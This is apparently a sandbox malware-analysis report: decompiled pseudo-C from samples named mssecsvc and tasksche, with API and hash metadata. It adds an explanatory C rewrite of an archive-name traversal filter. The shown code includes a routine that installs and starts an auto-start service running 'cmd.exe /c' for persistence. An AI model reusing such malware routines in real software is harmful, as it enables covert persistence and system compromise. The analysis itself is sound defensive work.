                                                                                                                                                						} while (_t101 >= 0);
                                                                                                                                                						asm("sbb ecx, 0x13e6");
                                                                                                                                                					} while (_t101 >= 0);
                                                                                                                                                					_t71 = _t47;
                                                                                                                                                					_t47 = 0;
                                                                                                                                                					_push( *((intOrPtr*)(_t67 + _t61 - 0x7fffec1c)));
                                                                                                                                                					_t88 = _t88 + 4;
                                                                                                                                                					_t28 =  &_v152;
                                                                                                                                                					 *_t28 = _v152 + 0xbab0;
                                                                                                                                                				} while ( *_t28 != 0);
                                                                                                                                                				_t68 = _t67 + 1;
                                                                                                                                                				L00A6B0D0(_t61, 0x77717bc2);
                                                                                                                                                				_v84 = _t79;
                                                                                                                                                				_t50 = L00A6B029(_t61, _t68, _t79);
                                                                                                                                                				_v100 = _t50;
                                                                                                                                                				if(_t50 - 4 >= 0) {
                                                                                                                                                					_t53 =  *[fs:0x18];
                                                                                                                                                					if(_t53 < 0) {
                                                                                                                                                						_t54 = L00A6B0D0(_t61, 0x75edf027);
                                                                                                                                                						L00A6B0CC();
                                                                                                                                                					} else {
                                                                                                                                                						_t71 = _t71 + 1;
                                                                                                                                                						_t54 =  *((intOrPtr*)(_t53 + 0x34));
                                                                                                                                                					}
                                                                                                                                                					if(_t54 == _t61) {
                                                                                                                                                						L00A6B145();
                                                                                                                                                					}
                                                                                                                                                					L00A6B0D0(_t61, 0x9937b23);
                                                                                                                                                					_push(_v108);
                                                                                                                                                					L00A6B0CC();
                                                                                                                                                				}
                                                                                                                                                				 *0x409b1a = 0xa0a815ff;
                                                                                                                                                				 *0x409b1e = 0x40;
                                                                                                                                                				_pop(_t52);
                                                                                                                                                				return _t52;
                                                                                                                                                			}
                                                                                                                                                0x00a6b336
                                                                                                                                                0x00a6b338
                                                                                                                                                0x00a6b33f
                                                                                                                                                0x00a6b342
                                                                                                                                                0x00a6b342
                                                                                                                                                0x00a6b342
                                                                                                                                                0x00a6b34e
                                                                                                                                                0x00a6b209
                                                                                                                                                0x00a6b20e
                                                                                                                                                0x00a6b212
                                                                                                                                                0x00a6b217
                                                                                                                                                0x00a6b21e
                                                                                                                                                0x00a6b224
                                                                                                                                                0x00a6b17b
                                                                                                                                                0x00a6b18e
                                                                                                                                                0x00a6b193
                                                                                                                                                0x00a6b17d
                                                                                                                                                0x00a6b180
                                                                                                                                                0x00a6b181
                                                                                                                                                0x00a6b181
                                                                                                                                                0x00a6b19a
                                                                                                                                                0x00a6b1a0
                                                                                                                                                0x00a6b1a0
                                                                                                                                                0x00a6b1aa
                                                                                                                                                0x00a6b1af
                                                                                                                                                0x00a6b1b3
                                                                                                                                                0x00a6b1b3
                                                                                                                                                0x00a6b1b8
                                                                                                                                                0x00a6b1c2
                                                                                                                                                0x00a6b1d5
                                                                                                                                                0x00a6b1d6

APIs
Memory Dump Source
• Source File: 0000000C.00000002.350837226.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.350828305.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.350856800.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.350865277.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.350893467.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.350977158.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1833031408-0
• Opcode ID: 5f72f19f3f9da0fc9539823f85b1e45c250ddb141765f627d1d6bf63dd3172bf
• Instruction ID: 6dbfe82e28d75cacd77da4482d95f0b678ec48d5d9d3d248bf29ddf29e6ef900
• Opcode Fuzzy Hash: 5f72f19f3f9da0fc9539823f85b1e45c250ddb141765f627d1d6bf63dd3172bf
• Instruction Fuzzy Hash: D941A371814308EFCB34DFA4DD416997BB8FB09720F24423BE5A1A72E2D7781941CB5A
Uniqueness
• Uniqueness Score: -1.00%
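
The decompiled listing for E00406C40 that follows contains two pieces of logic that are easier to judge in clean form: the while(1) loop over _t274 that scrubs an archive entry name of leading separators and "..\"-style traversal sequences (via _mbsstr) before strcpy copies it into the caller's entry structure, and the decoding of the external-attribute word (_v72) that switches on the host byte of the entry's "version made by" field (_v124 >> 8, compared against 0, 7, 0xb and 0xe). Reading _v124 as "version made by" and _v72 as the external attributes is my interpretation of the structure layout; the page does not name the fields. The C below is an added example written for this page, not code from the sample or from whatever archive library it was built from: strip_entry_name and decode_attrs are names chosen here, the drive-prefix handling is an assumption (the listing leaves the loop at that point and the continuation is outside the excerpt), and every input is constructed. One caveat the example makes visible: the filter only matches a ".." that is preceded by a separator, so a name that starts with "..\" or that is left with a leading "../" after one strip passes through unchanged.

```c
/* Added example, not code from the sample or from any library it embeds:
 * a readable rendering of the two checks visible in the decompiled
 * E00406C40 listing. All inputs below are constructed. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Entry-name filter, following the while(1) loop over _t274 in the listing:
 * skip leading '\' or '/', and after each "\..\", "\../", "/../" or "/..\"
 * hit, continue from just past it.
 * ASSUMPTION (my reading, not shown on the page): the listing leaves the loop
 * when it sees an "X:" drive prefix and the code after the loop is outside the
 * excerpt; here the two characters are dropped and the scan continues. */
static const char *strip_entry_name(const char *name)
{
    const char *p = name;
    for (;;) {
        if (p[0] != '\0' && p[1] == ':') { p += 2; continue; }  /* assumed */
        if (p[0] == '\\' || p[0] == '/') { p += 1; continue; }
        const char *c;
        if ((c = strstr(p, "\\..\\")) != NULL) { p = c + 4; continue; }
        if ((c = strstr(p, "\\../")) != NULL) { p = c + 4; continue; }
        if ((c = strstr(p, "/../")) != NULL)  { p = c + 4; continue; }
        if ((c = strstr(p, "/..\\")) != NULL) { p = c + 4; continue; }
        return p;  /* no pattern left: this is what the listing strcpy's out */
    }
}

struct entry_attrs { bool isdir, readonly, hidden, system; };

/* External-attribute decoding as in the listing: start from the unix-style
 * upper half (bit 30 = directory; the listing's "!(_t264 >> 0x17) & 1" is
 * read here as "bit 23 clear" = read-only), then, when the host byte
 * (version-made-by >> 8) is 0, 7, 11 or 14, take read-only, hidden and
 * system from the MS-DOS bits 0, 1 and 2. The listing is cut off inside that
 * branch, so nothing past bit 2 is reproduced. */
static struct entry_attrs decode_attrs(uint32_t external_fa, uint16_t version_made_by)
{
    struct entry_attrs a;
    a.isdir    = ((external_fa >> 30) & 1u) != 0;
    a.readonly = ((external_fa >> 23) & 1u) == 0;
    a.hidden   = false;
    a.system   = false;
    unsigned host = version_made_by >> 8;
    if (host == 0 || host == 7 || host == 11 || host == 14) {
        a.readonly = (external_fa & 1u) != 0;
        a.hidden   = ((external_fa >> 1) & 1u) != 0;
        a.system   = ((external_fa >> 2) & 1u) != 0;
    }
    return a;
}

int main(void)
{
    /* constructed entry names */
    const char *names[] = {
        "\\..\\..\\Windows\\evil.dll",  /* leading separator and two traversals */
        "C:\\Windows\\x.dll",           /* drive prefix (assumed handling) */
        "a/../../b/c.txt",              /* the leading ".." left after one strip survives */
        "..\\Windows\\x",               /* leading ".." with no separator before it */
    };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-28s -> %s\n", names[i], strip_entry_name(names[i]));

    struct entry_attrs u = decode_attrs(0x41ED8000u, 0x0300); /* unix host byte 3 */
    struct entry_attrs d = decode_attrs(0x00000027u, 0x0000); /* MS-DOS host byte 0 */
    printf("unix: dir=%d ro=%d  msdos: ro=%d hidden=%d system=%d\n",
           u.isdir, u.readonly, d.readonly, d.hidden, d.system);
    return 0;
}
```

When checking a sample that carries an embedded archive, run its entry names through this filter and look at what comes out the other side: anything still starting with ".." is a name the listed logic would hand to the file-writing code unchanged.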

                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
                                                                                                                                                				signed int _v5;
                                                                                                                                                				signed char _v10;
                                                                                                                                                				char _v11;
                                                                                                                                                				char _v12;
                                                                                                                                                				char _v16;
                                                                                                                                                				char _v20;
                                                                                                                                                				intOrPtr* _v24;
                                                                                                                                                				struct _FILETIME _v32;
                                                                                                                                                				struct _FILETIME _v40;
                                                                                                                                                				char _v44;
                                                                                                                                                				unsigned int _v72;
                                                                                                                                                				intOrPtr _v96;
                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                				unsigned int _v108;
                                                                                                                                                				unsigned int _v124;
                                                                                                                                                				char _v384;
                                                                                                                                                				char _v644;
                                                                                                                                                				char _t142;
                                                                                                                                                				char _t150;
                                                                                                                                                				void* _t151;
                                                                                                                                                				signed char _t156;
                                                                                                                                                				long _t173;
                                                                                                                                                				signed char _t185;
                                                                                                                                                				signed char* _t190;
                                                                                                                                                				signed char* _t194;
                                                                                                                                                				intOrPtr* _t204;
                                                                                                                                                				signed int _t207;
                                                                                                                                                				signed int _t208;
                                                                                                                                                				intOrPtr* _t209;
                                                                                                                                                				unsigned int _t210;
                                                                                                                                                				char _t212;
                                                                                                                                                				signed char _t230;
                                                                                                                                                				signed int _t234;
                                                                                                                                                				signed char _t238;
                                                                                                                                                				void* _t263;
                                                                                                                                                				unsigned int _t264;
                                                                                                                                                				signed int _t269;
                                                                                                                                                				signed int _t270;
                                                                                                                                                				signed int _t271;
                                                                                                                                                				intOrPtr _t272;
                                                                                                                                                				char* _t274;
                                                                                                                                                				unsigned int _t276;
                                                                                                                                                				signed int _t277;
                                                                                                                                                				void* _t278;
                                                                                                                                                				intOrPtr* _t280;
                                                                                                                                                				void* _t281;
                                                                                                                                                				intOrPtr _t282;
                                                                                                                                                
                                                                                                                                                				_t263 = __edx;
                                                                                                                                                				_t213 = __ecx;
                                                                                                                                                				_t272 = _a4;
                                                                                                                                                				_t208 = _t207 | 0xffffffff;
                                                                                                                                                				_t280 = __ecx;
                                                                                                                                                				_v24 = __ecx;
                                                                                                                                                				if(_t272 < _t208) {
                                                                                                                                                					L61:
                                                                                                                                                					return 0x10000;
                                                                                                                                                				}
                                                                                                                                                				_t131 =  *__ecx;
                                                                                                                                                				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                                                                                                                					goto L61;
                                                                                                                                                				}
                                                                                                                                                				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
                                                                                                                                                					E00406A97(_t131);
                                                                                                                                                					_pop(_t213);
                                                                                                                                                				}
                                                                                                                                                				 *(_t280 + 4) = _t208;
                                                                                                                                                				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
                                                                                                                                                					if(_t272 != _t208) {
                                                                                                                                                						_t132 =  *_t280;
                                                                                                                                                						if(_t272 >=  *( *_t280 + 0x10)) {
                                                                                                                                                							L12:
                                                                                                                                                							_t133 =  *_t280;
                                                                                                                                                							if( *( *_t280 + 0x10) >= _t272) {
                                                                                                                                                								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
                                                                                                                                                								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
                                                                                                                                                									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
                                                                                                                                                									if(_t142 != 0) {
                                                                                                                                                										L19:
                                                                                                                                                										return 0x800;
                                                                                                                                                									}
                                                                                                                                                									_push(_v16);
                                                                                                                                                									L00407700();
                                                                                                                                                									_v12 = _t142;
                                                                                                                                                									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
                                                                                                                                                										_t281 = _a8;
                                                                                                                                                										 *_t281 =  *( *_t280 + 0x10);
                                                                                                                                                										strcpy( &_v644,  &_v384);
                                                                                                                                                										_t209 = __imp___mbsstr;
                                                                                                                                                										_t274 =  &_v644;
                                                                                                                                                										while(1) {
                                                                                                                                                											L21:
                                                                                                                                                											_t150 =  *_t274;
                                                                                                                                                											if(_t150 != 0 && _t274[1] == 0x3a) {
                                                                                                                                                												break;
                                                                                                                                                											}
                                                                                                                                                											if(_t150 == 0x5c || _t150 == 0x2f) {
                                                                                                                                                												_t274 =  &(_t274[1]);
                                                                                                                                                												continue;
                                                                                                                                                											} else {
                                                                                                                                                												_t151 =  *_t209(_t274, "\\..\\");
                                                                                                                                                												if(_t151 != 0) {
                                                                                                                                                													L31:
                                                                                                                                                													_t39 = _t151 + 4; // 0x4
                                                                                                                                                													_t274 = _t39;
                                                                                                                                                													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}
                                                                                                                                                0x00406e11
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e11
                                                                                                                                                0x00406ded
                                                                                                                                                0x00406df3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406dfb
                                                                                                                                                0x00406e01
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e09
                                                                                                                                                0x00406e0f
                                                                                                                                                0x00406e1b
                                                                                                                                                0x00406e20
                                                                                                                                                0x00406e28
                                                                                                                                                0x00406e2c
                                                                                                                                                0x00406e3c
                                                                                                                                                0x00406e3e
                                                                                                                                                0x00406e41
                                                                                                                                                0x00406e44
                                                                                                                                                0x00406e46
                                                                                                                                                0x00406e61
                                                                                                                                                0x00406e6b
                                                                                                                                                0x00406e6d
                                                                                                                                                0x00406e78
                                                                                                                                                0x00406e7a
                                                                                                                                                0x00406e7c
                                                                                                                                                0x00406e7c
                                                                                                                                                0x00406e7e
                                                                                                                                                0x00406e82
                                                                                                                                                0x00406e88
                                                                                                                                                0x00406e8a
                                                                                                                                                0x00406e8a
                                                                                                                                                0x00406e96
                                                                                                                                                0x00406e98
                                                                                                                                                0x00406e98
                                                                                                                                                0x00406ea3
                                                                                                                                                0x00406ea5
                                                                                                                                                0x00406ea5
                                                                                                                                                0x00406eae
                                                                                                                                                0x00406eb0
                                                                                                                                                0x00406eb0
                                                                                                                                                0x00406ebb
                                                                                                                                                0x00406ebd
                                                                                                                                                0x00406ebd
                                                                                                                                                0x00406eca
                                                                                                                                                0x00406ed3
                                                                                                                                                0x00406ee6
                                                                                                                                                0x00406ef2
                                                                                                                                                0x00406ef5
                                                                                                                                                0x00406efb
                                                                                                                                                0x00406efe
                                                                                                                                                0x00406f05
                                                                                                                                                0x00406f08
                                                                                                                                                0x00406f0e
                                                                                                                                                0x00406f14
                                                                                                                                                0x00406f1a
                                                                                                                                                0x00406f20
                                                                                                                                                0x00406f26
                                                                                                                                                0x00406f2c
                                                                                                                                                0x00407037
                                                                                                                                                0x00407039
                                                                                                                                                0x0040703b
                                                                                                                                                0x0040703c
                                                                                                                                                0x00407041
                                                                                                                                                0x00407048
                                                                                                                                                0x0040704f
                                                                                                                                                0x0040705a
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f32
                                                                                                                                                0x00406f32
                                                                                                                                                0x00406f3a
                                                                                                                                                0x00406f41
                                                                                                                                                0x00406f45
                                                                                                                                                0x00406f4d
                                                                                                                                                0x00406f5d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f62
                                                                                                                                                0x00406f6c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f6e
                                                                                                                                                0x00406f73
                                                                                                                                                0x00406f81
                                                                                                                                                0x00406f86
                                                                                                                                                0x00406f89
                                                                                                                                                0x00406f8f
                                                                                                                                                0x00406f92
                                                                                                                                                0x00406f94
                                                                                                                                                0x00406f99
                                                                                                                                                0x00406f9e
                                                                                                                                                0x00406fba
                                                                                                                                                0x00406fc0
                                                                                                                                                0x00406fc4
                                                                                                                                                0x00406fc4
                                                                                                                                                0x00406fcc
                                                                                                                                                0x00406fce
                                                                                                                                                0x00406fd3
                                                                                                                                                0x00406fd8
                                                                                                                                                0x00406ff4
                                                                                                                                                0x00406ffb
                                                                                                                                                0x00406ffb
                                                                                                                                                0x00407005
                                                                                                                                                0x00407007
                                                                                                                                                0x0040702a
                                                                                                                                                0x00407031
                                                                                                                                                0x00407031
                                                                                                                                                0x00000000
                                                                                                                                                0x00407005
                                                                                                                                                0x00406f2c
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e0f
                                                                                                                                                0x00406dd0
                                                                                                                                                0x00406dcb
                                                                                                                                                0x00000000
                                                                                                                                                0x00406dcb
                                                                                                                                                0x00406d80
                                                                                                                                                0x00406d83
                                                                                                                                                0x00000000
                                                                                                                                                0x00406d88
                                                                                                                                                0x00000000
                                                                                                                                                0x00406d40
                                                                                                                                                0x00406d02
                                                                                                                                                0x00406cf9
                                                                                                                                                0x00406cf9
                                                                                                                                                0x00000000
                                                                                                                                                0x00406cf9
                                                                                                                                                0x00406cf4
                                                                                                                                                0x00000000
                                                                                                                                                0x00406cf4
                                                                                                                                                0x00000000
                                                                                                                                                0x00406c81
                                                                                                                                                0x00406c83
                                                                                                                                                0x00406ca2
                                                                                                                                                0x00406ca7
                                                                                                                                                0x00406caa
                                                                                                                                                0x00406cae
                                                                                                                                                0x00406cb1
                                                                                                                                                0x00406cb7
                                                                                                                                                0x00406cbd
                                                                                                                                                0x00406cc3
                                                                                                                                                0x00406cc9
                                                                                                                                                0x00406ccf
                                                                                                                                                0x00406cd5
                                                                                                                                                0x00406cdb
                                                                                                                                                0x00406ce1
                                                                                                                                                0x00407060
                                                                                                                                                0x00000000
                                                                                                                                                0x00407060
                                                                                                                                                0x00406c91
                                                                                                                                                0x00000000
                                                                                                                                                0x00406c96

APIs
• memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
Strings
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: /../$/..\$\../$\..\
• API String ID: 3510742995-3885502717
• Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
• Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
• Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
• Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00401CE8(intOrPtr _a4) {
	void* _v8;
	int _v12;
	void* _v16;
	char _v1040;
	void* _t12;
	void* _t13;
	void* _t31;
	int _t32;

	_v12 = 0;
	_t12 = OpenSCManagerA(0, 0, 0xf003f); // 0xF003F = SC_MANAGER_ALL_ACCESS
	_v8 = _t12;
	if(_t12 != 0) {
		_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff); // service name string at 0x40f8ac; 0xF01FF = SERVICE_ALL_ACCESS
		_v16 = _t13;
		if(_t13 == 0) {
			// service does not exist yet: build a "cmd.exe /c <arg>" binary path and register it
			sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
			// 0x10 = SERVICE_WIN32_OWN_PROCESS, 2 = SERVICE_AUTO_START, 1 = SERVICE_ERROR_NORMAL
			_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
			if(_t31 != 0) {
				StartServiceA(_t31, 0, 0);
                                                                                                                                                							CloseServiceHandle(_t31);
                                                                                                                                                							_v12 = 1;
                                                                                                                                                						}
                                                                                                                                                						_t32 = _v12;
                                                                                                                                                					} else {
                                                                                                                                                						StartServiceA(_t13, 0, 0);
                                                                                                                                                						CloseServiceHandle(_v16);
                                                                                                                                                						_t32 = 1;
                                                                                                                                                					}
                                                                                                                                                					CloseServiceHandle(_v8);
                                                                                                                                                					return _t32;
                                                                                                                                                				}
                                                                                                                                                				return 0;
                                                                                                                                                 			}

                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                                                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                                                                                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                                                                                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                 • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandleOpen$ManagerStart
                                                                                                                                                • String ID: cmd.exe /c "%s"
                                                                                                                                                • API String ID: 1485051382-955883872
                                                                                                                                                • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                                                                                • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                                                                                                                                                • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                                                                                • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				char _v24;
                                                                                                                                                				int _t193;
                                                                                                                                                				signed int _t198;
                                                                                                                                                				int _t199;
                                                                                                                                                				intOrPtr _t200;
                                                                                                                                                				signed int* _t205;
                                                                                                                                                				signed char* _t206;
                                                                                                                                                				signed int _t208;
                                                                                                                                                				signed int _t210;
                                                                                                                                                				signed int* _t216;
                                                                                                                                                				signed int _t217;
                                                                                                                                                				signed int* _t220;
                                                                                                                                                				signed int* _t229;
                                                                                                                                                				void* _t252;
                                                                                                                                                				void* _t280;
                                                                                                                                                				void* _t281;
                                                                                                                                                				signed int _t283;
                                                                                                                                                				signed int _t289;
                                                                                                                                                				signed int _t290;
                                                                                                                                                				signed char* _t291;
                                                                                                                                                				signed int _t292;
                                                                                                                                                				void* _t303;
                                                                                                                                                				void* _t313;
                                                                                                                                                				intOrPtr* _t314;
                                                                                                                                                				void* _t315;
                                                                                                                                                				intOrPtr* _t316;
                                                                                                                                                				signed char* _t317;
                                                                                                                                                				signed char* _t319;
                                                                                                                                                				signed int _t320;
                                                                                                                                                				signed int _t322;
                                                                                                                                                				void* _t326;
                                                                                                                                                				void* _t327;
                                                                                                                                                				signed int _t329;
                                                                                                                                                				signed int _t337;
                                                                                                                                                				intOrPtr _t338;
                                                                                                                                                				signed int _t340;
                                                                                                                                                				intOrPtr _t341;
                                                                                                                                                				void* _t342;
                                                                                                                                                				signed int _t345;
                                                                                                                                                				signed int* _t346;
                                                                                                                                                				signed int _t347;
                                                                                                                                                				void* _t352;
                                                                                                                                                				void* _t353;
                                                                                                                                                				void* _t354;
                                                                                                                                                
                                                                                                                                                				_t352 = __ecx;
                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                					_a8 = 0x40f57c;
